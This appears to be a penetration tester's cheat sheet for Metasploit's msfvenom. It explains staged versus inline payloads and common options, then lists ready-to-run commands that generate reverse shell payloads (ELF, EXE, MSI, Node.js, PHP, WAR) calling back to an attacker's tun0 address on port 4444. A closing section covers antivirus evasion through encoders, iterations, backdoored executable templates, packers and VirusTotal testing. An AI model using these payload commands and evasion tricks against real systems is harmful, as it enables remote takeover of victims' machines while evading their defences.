🐍 msfvenom 🐍

shells_and_payloads fileuploadattacks introtoshells metasploitexploitation

msfvenom is a tool of the metasploit framework to generate payloads for reverse shells. We can customize payloads according to:

  • 🎠 the program executing the payload (PHP, python...)
  • 🏑 the target operating system
  • πŸ›‘οΈ the presence and configuration of a firewall
  • πŸ”«οΈ the presence and configuration of an antivirus
  • ...
$ msfvenom --list payloads
$ msfvenom --list payloads | grep meterpreter

msfvenom is often used with the msfconsole to catch them and pop a meterpreter shell (see Metasploit framework, in short, an upgraded shell).

Metasploit separated staged payloads from inline payloads. The former is involving two steps: a simple payload (called stage/stager) is sent, which then request the rest of the payload. They are mainly used when there is a restriction on the size of the payload.

In Metasploit, the _ is replaced with a / for staged payloads.

  • php/meterpreter_reverse_tcp: inline/single
  • php/meterpreter/reverse_tcp: staged

🐸 Common options 🐸

-p to define the payload to use.

$ msfvenom -p cmd/unix/reverse_netcat [...]

LHOST/LPORT to define where the target will connect back.

$ msfvenom [...] LHOST=tun0 LPORT=4444

-f to define the format of the output. For instance, raw code.

$ msfvenom [...] -f raw
$ msfvenom [...] R # same for -f RAW

-e to define the encoding. It's mainly used to bypass firewall or reduce the size of the payload.

$ msfvenom [...] -e php/base64

πŸ“Œ Some payloads πŸ“Œ

All examples are asking the target to connect back to tun0 IP at the port 4444.

  • Linux (.elf / ...)
# execute /bin/bash -p
$ msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o shell.elf
# Generate a .elf opening a reverse shell (TCP)
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f elf -o shell.elf
# Output a command (RAW) opening a reverse shell with netcat
$ msfvenom -p cmd/unix/reverse_netcat LHOST=tun0 LPORT=4444 -f raw
  • Windows (.exe / .msi / ...)
# Generate a .exe opening a reverse shell (TCP)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o shell.exe
# Generate a malicious installer (msi)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f msi -o shell.msi
  • Node.js 
# Generate a .js opening a reverse shell (TCP)
$ msfvenom -p nodejs/shell_reverse_tcp LHOST=tun0 LPORT=4444 -o shell.js
  • PHP 
# very unstable shell, not recommended
$ msfvenom -p php/reverse_php LHOST=tun0 LPORT=4444 -o revshell.php
# meterpreter
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -o revshell.php
  • Tomcat 
# works with Tomcat 7.8
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=4444 -f war -o revshell.war

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

Payload Encoding: make the payload comptabible with different architectures and help with antivirus evasion.

  • Shikata Ga Nai (SGN): good but still detected by modern antivirus. -e x86/shikata_ga_nai
  • Use iterations to make it harder to detect: -i 10
  • Password-protected archives are an additional antivirus evasion technique
  • backdoored executable: use executable templates to hide the code
  • Packers are also an alternative: polypack

Other options:

  • -a x86: explicit architecture
  • --platform windows: explicit platform
  • -k: with backdoored executable, the original executable still runs as it was. If started from a terminal, a new terminal will (still) pop.
  • -x xxx.exe
  • -o xxx.exe

Test on Virus Total: msf-virustotal -k <API key> -f xxx.exe